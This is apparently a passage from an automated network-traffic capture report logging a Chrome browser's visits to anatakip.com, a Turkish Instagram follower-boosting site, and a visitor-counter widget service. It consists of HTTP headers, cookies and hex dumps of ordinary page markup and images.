                    Date: Sun, 26 May 2024 22:58:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: BYPASS
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=93lEOGEuA%2Bg2tyU6SB%2B6nY1ekelcJlorww9WXDGWAmpfH41b05Jzi6Ln5TDjvcjI5RPYgVHejb%2BLsYWP8w9gFUCPRuSEMKZdIDMzTfO%2BcMmq%2BtJVt5vNN5yEkRGI8Ks%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15e3f08267c9f-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:08 UTC625INData Raw: 31 63 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 1c76<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:58:08 UTC1369INData Raw: 65 74 73 2f 73 74 79 6c 65 2f 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61 67 72 61 6d 20 65 6e 20 69 79 69 20 70 72 6f 66 69 6c 69 20 68 61 6c 69 6e 65 20 67 65 74 69 72
                    Data Ascii: ets/style/paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Page Not Found | AnaTakip kendinizi instagram en iyi profili haline getir
                    2024-05-26 22:58:08 UTC1369INData Raw: 72 2d 63 6f 6c 6c 61 70 73 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 6c 65 66 74 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 6e
                    Data Ascii: r-collapse" aria-expanded="false"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button></div><div class="navbar-collapse collapse navbar-left"><ul class="n
                    2024-05-26 22:58:08 UTC1369INData Raw: 3e 0a 3c 68 35 3e 4b 69 6d 6c 65 72 20 4b 75 6c 6c 61 6e 61 62 69 6c 69 72 3c 2f 68 35 3e 0a 3c 70 3e 49 6e 73 74 61 67 72 61 6d 20 c3 bc 79 65 6c 69 c4 9f 69 20 6f 6c 61 6e 20 68 65 72 6b 65 73 20 73 69 73 74 65 6d 69 20 6b 75 6c 6c 61 6e 61 62 69 6c 69 72 2e 20 49 6e 73 74 61 67 72 61 6d 20 68 65 73 61 62 c4 b1 6e c4 b1 7a 6c 61 20 67 69 72 69 c5 9f 20 79 61 70 c4 b1 6e 20 76 65 20 68 65 6d 65 6e 20 6b 75 6c 6c 61 6e 6d 61 79 61 20 62 61 c5 9f 6c 61 79 c4 b1 6e 2e 20 4b 75 6c 6c 61 6e c4 b1 6d 20 c3 bc 63 72 65 74 73 69 7a 64 69 72 2e 20 4b 72 65 64 69 20 73 61 74 c4 b1 6e 20 61 6c 6d 61 64 c4 b1 6b c3 a7 61 20 68 69 c3 a7 62 69 72 20 c3 bc 63 72 65 74 20 c3 b6 64 65 6d 65 7a 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61
                    Data Ascii: ><h5>Kimler Kullanabilir</h5><p>Instagram yelii olan herkes sistemi kullanabilir. Instagram hesabnzla giri yapn ve hemen kullanmaya balayn. Kullanm cretsizdir. Kredi satn almadka hibir cret demezsiniz.</p></div><div cla
                    2024-05-26 22:58:08 UTC1369INData Raw: 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 63 6f 72 65 2f 63 6f 72 65 2e 6a 73 3f 76 3d 33 2e 31 2e 31 30 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 09 09 09 28 66 75 6e 63 74 69 6f 6e 20 28 69 2c 20 73 2c 20 6f 2c 20 67 2c 20 72 2c 20 61 2c 20 6d 29 20 7b 0a 09 09 09 09 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 20 3d 20 72 3b 0a 09 09 09 09 69 5b 72 5d 20 3d 20 69 5b 72 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 09 09 28 69 5b 72 5d 2e 71 20 3d 20 69 5b 72 5d 2e 71 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 0a 09 09 09 09 7d 2c 20 69 5b
                    Data Ascii: ript><script src="/assets/core/core.js?v=3.1.10"></script><script type="text/javascript">(function (i, s, o, g, r, a, m) {i['GoogleAnalyticsObject'] = r;i[r] = i[r] || function () {(i[r].q = i[r].q || []).push(arguments)}, i[
                    2024-05-26 22:58:08 UTC1193INData Raw: 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 61 61 61 61 61 61 3b 0a 09 09 09 09 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6c 6f 73 65 3a 68 6f 76 65 72 2c 0a 09 09 09 2e 63 6c 6f 73 65 3a 66 6f 63 75 73 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 09 09 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 09 09 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 6d 6f 64 61 6c 2d 6f 70 65 6e 20 2e 6d 6f 64 61 6c 20 7b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77
                    Data Ascii: color: #aaaaaa;float: right;font-size: 28px;font-weight: bold;}.close:hover,.close:focus {color: #000;text-decoration: none;cursor: pointer;}.modal-open .modal {overflow-x: hidden;overflow
                    2024-05-26 22:58:08 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    61192.168.2.549817104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:08 UTC589OUTGET /widget/instamark.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:08 UTC373INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:58:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/13/1371.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15e441a8a430f-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:08 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    62192.168.2.549818104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:09 UTC589OUTGET /widget/anatakipx.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:09 UTC371INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:58:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/00/53.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15e47ea2a8c54-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:09 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    63192.168.2.549825104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:11 UTC591OUTGET /classic/13/1371.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:11 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:11 GMT
                    Content-Type: image/png
                    Content-Length: 1589
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:11 GMT
                    etag: "4c149ecf-635"
                    expires: Wed, 15 May 2024 18:17:57 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1053614
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15e554ece4225-EWR
                    2024-05-26 22:58:11 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 cd 50 4c 54 45 ff ff ff 8e 8e 8e c8 c8 c8 c9 c9 c9 e9 e9 e9 7d 7d 7d bc bc bc d2 d2 d2 8b 8b 8b c6 c6 c6 e3 e3 e3 e4 e4 e4 ae ae ae d6 d6 d6 ea ea ea 99 99 99 bf bf bf d3 d3 d3 77 77 77 d1 d1 d1 b9 b9 b9 74 74 74 e7 e7 e7 88 88 88 e1 e1 e1 c7 c7 c7 76 76 76 72 72 72 e2 e2 e2 90 90 90 92 92 92 93 93 93 a5 a5 a5 ad ad ad aa aa aa a8 a8 a8 a6 a6 a6 a4 a4 a4 8d 8d 8d e8 e8 e8 a2 a2 a2 d0 d0 d0 70 70 70 cf cf cf a0 a0 a0 ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f 37 3b 52 4a 4a 8c 23 27 b6 26 2b 5b
                    Data Ascii: PNGIHDRQpPLTE}}}wwwtttvvvrrrppp\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;7;RJJ#'&+[
                    2024-05-26 22:58:11 UTC652INData Raw: 75 bc 2e 29 03 9a 57 b1 9c 13 37 be 0a ee 8e 88 fd 7f e6 62 04 34 19 34 36 7d df 17 ec c9 8b 05 64 a5 6d 3a 85 85 d2 55 b5 f6 22 3a d1 74 18 9f 84 73 b1 2f 2f 01 01 6d 02 cb b2 63 e7 7d e3 5c 62 59 ae 4c d8 c3 f2 94 21 10 06 b3 55 b5 6a 89 79 c1 10 96 0d 6e c9 c7 7a 76 7d ef cb 10 b8 57 a8 33 9b 6f fd e4 ac db 70 65 31 09 5b fa 9b 39 25 41 41 81 b0 a3 d9 49 0b d8 5c 8c 81 d0 be 2f 5d 83 af 51 f3 94 19 55 c9 b9 cd 30 cc 6e 92 2a 67 32 1c 69 50 31 03 a5 8c 23 29 94 d8 72 dd 3a f6 7d bd f1 35 66 67 bc b5 3e fa 8e 4d b1 9e b1 5a f9 f8 fd ac 55 04 3b 58 1d f8 c1 66 b6 ec 01 3d ec fb 94 4a 04 0c 4f 0d b9 cb cb b1 d4 94 54 83 61 dc aa 89 5c 2e 4f 31 08 60 80 c1 41 53 08 9b da 72 6d fb 3e 55 ee 46 04 ac 05 a5 b9 d7 7e 60 39 0f 73 c2 73 7e 3c 0c 1f cc bd d9 2c fe
                    Data Ascii: u.)W7b446}dm:U":ts//mc}\bYL!Ujynzv}W3ope1[9%AAI\/]QU0n*g2iP1#)r:}5fg>MZU;Xf=JOTa\.O1`ASrm>UF~`9ss~<,


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    64192.168.2.549827104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:12 UTC359OUTGET /classic/13/1371.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: */*
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:12 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:12 GMT
                    Content-Type: image/png
                    Content-Length: 1589
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:11 GMT
                    etag: "4c149ecf-635"
                    expires: Wed, 15 May 2024 18:17:57 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1053615
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15e5d7b6d424a-EWR
                    2024-05-26 22:58:12 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 cd 50 4c 54 45 ff ff ff 8e 8e 8e c8 c8 c8 c9 c9 c9 e9 e9 e9 7d 7d 7d bc bc bc d2 d2 d2 8b 8b 8b c6 c6 c6 e3 e3 e3 e4 e4 e4 ae ae ae d6 d6 d6 ea ea ea 99 99 99 bf bf bf d3 d3 d3 77 77 77 d1 d1 d1 b9 b9 b9 74 74 74 e7 e7 e7 88 88 88 e1 e1 e1 c7 c7 c7 76 76 76 72 72 72 e2 e2 e2 90 90 90 92 92 92 93 93 93 a5 a5 a5 ad ad ad aa aa aa a8 a8 a8 a6 a6 a6 a4 a4 a4 8d 8d 8d e8 e8 e8 a2 a2 a2 d0 d0 d0 70 70 70 cf cf cf a0 a0 a0 ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f 37 3b 52 4a 4a 8c 23 27 b6 26 2b 5b
                    Data Ascii: PNGIHDRQpPLTE}}}wwwtttvvvrrrppp\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;7;RJJ#'&+[
                    2024-05-26 22:58:12 UTC652INData Raw: 75 bc 2e 29 03 9a 57 b1 9c 13 37 be 0a ee 8e 88 fd 7f e6 62 04 34 19 34 36 7d df 17 ec c9 8b 05 64 a5 6d 3a 85 85 d2 55 b5 f6 22 3a d1 74 18 9f 84 73 b1 2f 2f 01 01 6d 02 cb b2 63 e7 7d e3 5c 62 59 ae 4c d8 c3 f2 94 21 10 06 b3 55 b5 6a 89 79 c1 10 96 0d 6e c9 c7 7a 76 7d ef cb 10 b8 57 a8 33 9b 6f fd e4 ac db 70 65 31 09 5b fa 9b 39 25 41 41 81 b0 a3 d9 49 0b d8 5c 8c 81 d0 be 2f 5d 83 af 51 f3 94 19 55 c9 b9 cd 30 cc 6e 92 2a 67 32 1c 69 50 31 03 a5 8c 23 29 94 d8 72 dd 3a f6 7d bd f1 35 66 67 bc b5 3e fa 8e 4d b1 9e b1 5a f9 f8 fd ac 55 04 3b 58 1d f8 c1 66 b6 ec 01 3d ec fb 94 4a 04 0c 4f 0d b9 cb cb b1 d4 94 54 83 61 dc aa 89 5c 2e 4f 31 08 60 80 c1 41 53 08 9b da 72 6d fb 3e 55 ee 46 04 ac 05 a5 b9 d7 7e 60 39 0f 73 c2 73 7e 3c 0c 1f cc bd d9 2c fe
                    Data Ascii: u.)W7b446}dm:U":ts//mc}\bYL!Ujynzv}W3ope1[9%AAI\/]QU0n*g2iP1#)r:}5fg>MZU;Xf=JOTa\.O1`ASrm>UF~`9ss~<,


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    65192.168.2.549835104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:13 UTC831OUTGET / HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-Dest: document
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764287.0.0.0; _ga=GA1.2.1095029423.1716764258
                    2024-05-26 22:58:13 UTC734INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JwVpQ9SA%2FtM2U382ggivxTnQ22FtCvRtBDmmZZIXyCMKVFjwqrMlheF3sdfzeq3%2B%2BnevF3x5074tZsyZmZ46UuCYqDegKqwiWZu9QO8z2wu6ZbR88I3Rdkk4i6BrGCQ%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15e62af3617b5-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:13 UTC635INData Raw: 33 36 39 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 3692<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:58:13 UTC1369INData Raw: 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 6f 72 75 6e 73 75 7a 20 69 6e 73 74 61 67 72 61 6d 20 74 61 6b 69 70 c3 a7 69 20 68 69 6c 65 73 69 20 76 65 20 69 6e 73 74 61 67 72 61 6d 20 62 65 c4 9f 65 6e 69 20 68 69 6c 65 73 69 20 79 61 70 61 72 61 6b 20 6b 65 6e 64 69 20 74 61 6b 69 70 c3
                    Data Ascii: paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Sorunsuz instagram takipi hilesi ve instagram beeni hilesi yaparak kendi takip
                    2024-05-26 22:58:13 UTC1369INData Raw: 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 09 09 09 09 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 54 31 4b 35 46 52 32 37 51 36 27 29 3b 0a 09 09 09 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 64 65 66 61 75 6c 74 20 6e 61 76 62 61 72 2d 66 69 78 65 64 2d 74 6f 70 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 68 65 61 64 65 72 20 70 75 6c 6c 2d 6c 65 66 74 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 22 20 68 72 65 66 3d 22 2f 22 3e 0a 3c 69 6d 67 20 61 6c 74 3d 22 69 6e 73 74 61 67
                    Data Ascii: ', new Date());gtag('config', 'G-T1K5FR27Q6');</script></head><body><header><nav class="navbar navbar-default navbar-fixed-top"><div class="container"><div class="navbar-header pull-left"><a class="navbar-brand" href="/"><img alt="instag
                    2024-05-26 22:58:13 UTC1369INData Raw: 61 6e 2c 20 73 65 63 74 69 6f 6e 2e 68 65 61 64 20 70 20 7b 0d 0a 09 09 63 6f 6c 6f 72 3a 20 77 68 69 74 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 09 7d 0d 0a 0d 0a 09 73 65 63 74 69 6f 6e 2e 68 65 61 64 20 70 20 61 3a 6e 6f 74 28 2e 62 74 6e 29 20 7b 0d 0a 09 09 63 6f 6c 6f 72 3a 20 61 71 75 61 3b 0d 0a 09 7d 0d 0a 0d 0a 09 2e 64 65 73 63 72 69 70 74 69 6f 6e 42 6c 6f 63 6b 20 7b 0d 0a 09 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0d 0a 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 30 70 78 20 31 36 70 78 20 30 70 78 20 72 67 62 61 28 35 30 2c 20 35 30 2c 20 35 30 2c 20 30 2e 34 29 3b 0d
